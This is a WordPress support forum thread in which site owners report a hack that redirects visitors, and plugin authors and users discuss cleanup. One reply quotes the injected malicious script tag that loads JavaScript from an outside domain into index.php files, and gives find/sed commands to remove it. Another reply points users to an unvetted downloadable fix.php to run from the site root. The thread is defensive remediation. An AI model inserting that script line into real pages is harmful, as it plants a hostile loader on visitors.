• Anonymous User 15236515



    When opening my site (and admin) , I’am directed to
    which is immediately referred to

    also :

    Hacked ? … so what can I do please ?

    Best Regards,

    The page I need help with: [log in to see the link]

Viewing 15 replies - 1 through 15 (of 15 total)
  • Plugin Author alexandergull


    Hello @fritzke

    Did you start a scan using the CleanTalk Security plugin?

    What the result you’ve got?

    Thread Starter Anonymous User 15236515



    That’s not possible because I can’t get into my admin or site.

    Plugin Author alexandergull


    Hacked ? … so what can I do please ?

    It seems yes. Please, contact your hosting provider to restore the site from a good-functional backup copy.

    When it will be done, scan the site using the CleanTalk Security plugin and give us feedback with founded results.

    Best regards,

    Thread Starter Anonymous User 15236515


    ok … I’am busy to restore a backup … thanks … I’ll let you know

    Thread Starter Anonymous User 15236515


    Can “WPBakery Page Builder” be the culprit ?

    Problems, slow and finaly nothing anymore, started when working with built-in content elements “hover box”.

    Plugin Author alexandergull


    Thank you all for your feedback.
    We recommend do the next steps

    1)Сontact your hosting provider to restore the site from a good-functional backup copy.

    2)Install the Security for WordPress plugin. https://downloads.wordpress.org/plugin/security-malware-firewall.2.46.2.zip

    3)Scan the site using the CleanTalk Security plugin and give us feedback with founded results https://cleantalk.org/help/security-malware-scanner

    4)Send us scanner results using this guide https://cleantalk.org/help/files-analysis

    Best wishes

    Thread Starter Anonymous User 15236515



    I send 7 “critical” files. But I think those are positive false.




    My website have been attack this night too.

    All your index.php files have been infected by an injection of a javascript call ‘<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>&#8217;

    1 – You have to remove this line in each index file by using find & sed

    find . -name “index.php” -exec sed -i “s#<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>##g&#8221; {} +

    2 – Remove extra index files created by the sript

    find . -name “._index.php” -print -delete

    3 – The script have change the siteurl in the database you have to fix it

    in the table wp_options where option_name is siteurl replace the option_value by the correct url

    Glad to help

    Plugin Author alexandergull


    @fritzke We’ve checked these files. Yes, they are safe.
    @nikko75 Thank you for help! This must be a solution.
    Best regards,



    SOLVED (For my case at least)

    If you look at the code that @jommartinez posted – I’m sure that is what affected the site of mine. The only file that is modified is the header.php in the theme. This is reflected in his posted code.

    Some of you on this thread may have had a slightly modified version of this or have suffered multiple hacks so this fix may not resolve the issue for everyone here.

    For my specific case I did the following;

    – Removed the line from the header.php file in your theme – If you can remove the (line in where it is calling the javascript. it may be called in an abstract way like it was on my site using the “cryptico.js” js to encrypt the exploit call making it harder to notice.)

    – Once this has been done you will need to roll back your database.

    – I would strongly recommend any of you using a PHP version lower than 7.2 to upgrade.

    I would be keen to hear if this helped anyone else.



    Helllo @donnjke @spaceapemedia @tomtschi @maltris @nathalierobayo

    Please, someone send the “header.php”, templates and JS files. We a making a cure right now. It will be ready in 10 minutes, but we need the data.

    Plugin Author Denis


    Send the files to welcome@cleantalk.org.

    Moderator Steven Stern (sterndata)


    Volunteer Forum Moderator

    Note: Malware code has been removed by the moderators. Please do not post malware here.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Moderator Jan Dembowski


    Forum Moderator and Brute Squad

    If you need support and you are not the person who originally raised this support topic then per the forum guidelines please start your own topic.


    You can do so here.


    I am closing this topic and archiving all of the pile on replies. I’ve left a couple that were helpful. Do not take over someone else’s topic that way again. That’s not how these forums work and please create you own topic instead.

    Moderator Jan Dembowski


    Forum Moderator and Brute Squad

    Per @shagimuratov

    Hello everyone.

    The cure is here. I mean this topic https://wordpress.org/support/topic/hacked-138/

    Install the latest plugin from here: https://github.com/CleanTalk/security-malware-firewall/releases/download/dev-version/security-malware-firewall.zip.

    Switch setting “Cure malware” and “Signature analysis”, save settings and run the scan.

    It will cure JS script attachments in PHP files and malicious PHP code.

    If your database malformed and experiencing difficulties with restoring it. Put this file (https://www.dropbox.com/s/xr421acpxbqp72j/fix.php?dl=0) in the root directory and proceed to YOUR_WEBSITE.URL/fix.php, do not forget to delete it!

    Let us know if you have questions.

    If you do have questions, please post your own support topic.

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘hacked’ is closed to new replies.